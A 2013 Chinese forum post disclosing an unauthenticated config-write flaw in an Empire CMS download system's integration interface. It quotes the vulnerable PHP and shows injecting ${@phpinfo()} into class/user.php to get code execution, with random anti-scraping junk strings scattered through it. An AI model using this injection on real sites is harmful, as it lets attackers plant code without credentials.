帝国万能接口漏洞0day

admin · 发表于 2013-1-23 09:34:37

这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们
# S8 C: k8 l3 f- |' ]3 R
& [+ y$ w: @0 a5 J: N
$ D5 |- M5 g3 u& X% h
这是帝国的一套下载系统如图
  Q. v: C: n; e% G" N3 r; aps(不需要任何账户和密码，直接写shell)

( a  [( ^$ p" {- K* F% J4 b
由于很多站是由于下载要整合discuz 等等一些论坛....
- H  g( K* ^0 f" ]' G) |3 d; L

) T5 x- {* e- y3 q) _! E
而帝国他又有一个万能接口，如图

2 X8 l) _% D, j( y
6 U; d9 r0 k' b& U$ k* w* u- E4 z) i+ U# \) a
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码
7 O3 k  w- N! s% }
5 ?/ @0 n8 U+ b% R6 s当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪
% F% h: ]2 R% h/ C* g) Q2 \$ Y  i, g2 K. e* v
在data/fun.php中的15行
5 _; B. [3 P3 ~2 q! L7 S  {
" X$ Z5 i- ]& V1 o1 G# n1 K! a我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
; T% H3 D  P- m8 T: L
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干+ V  o* _. }7 n1 r! ~. g7 Y- f: @
  y9 w) O% A# s
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
, M5 R) T8 P( a& k! G
5 f" A0 l, q+ i他将传进来的变量进行了切割，然后赋给了$filetext
' z) G5 i, s1 \+ z+ i& ^0 E2 ]3 R" v" \9 c; m- x' s# B
然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了
' x) P1 p5 O" G2 [3 O! X' z$ Q/ e! d, c& s/ `7 z0 b
我们看看写入的结果，随便填一个
! {, M- Z1 B$ f

$ u  T$ \$ a! P! `' i% w) E5 K2 U% c3 h2 z3 Z+ R

' U' \8 C& {; o
& H- q5 U: Z6 E! H, v) `% u6 H1 W) L' H7 J

3 k4 M2 \& }: @
. d$ J8 j; G7 D( Z6 Q( I: Y. g
3 |! t7 N! p1 j7 C* k$ f. _# X0 R5 K$ y% M, p! [

" p* E1 e. M1 H5 ~3 n
" |% b9 ^# [; m, c( I
, n1 c* m5 F8 J) v, e9 a( v3 ^$ K! r% v; W% a! X8 J3 ]

5 t! J) K1 i1 K5 }# S. o1 a5 \2 A( e3 _
+ V6 ^3 T4 c- T  ?& i4 m

6 _7 T7 Y" J3 D: O2 I
. C, I) u* h8 \! Y: X% X! ~" B: _' i! Y$ ]

5 k! I# n+ z8 v4 m5 p( |* i. t0 o4 A* }, ?6 c' U
所以我们淫荡点，写个${@phpinfo()}试试

6 Q+ C8 g6 j$ v' L, ]1 A
然后访问以下class/user.php这个文件
* t. \8 F7 A& @& J$ o: J% }# R" P2 K日了吧

! J9 R5 ?$ V1 f) z! S, r) o! \" Y4 ^3 W6 w
5 d+ U/ R  |( P( j" `& }  Y( x1 Q# Y
8 A% ]1 F& a/ E& a" X

$ n# {' W  I  v; K. n

		自动登录	找回密码
密码			立即注册

帝国万能接口漏洞0day

本帖子中包含更多资源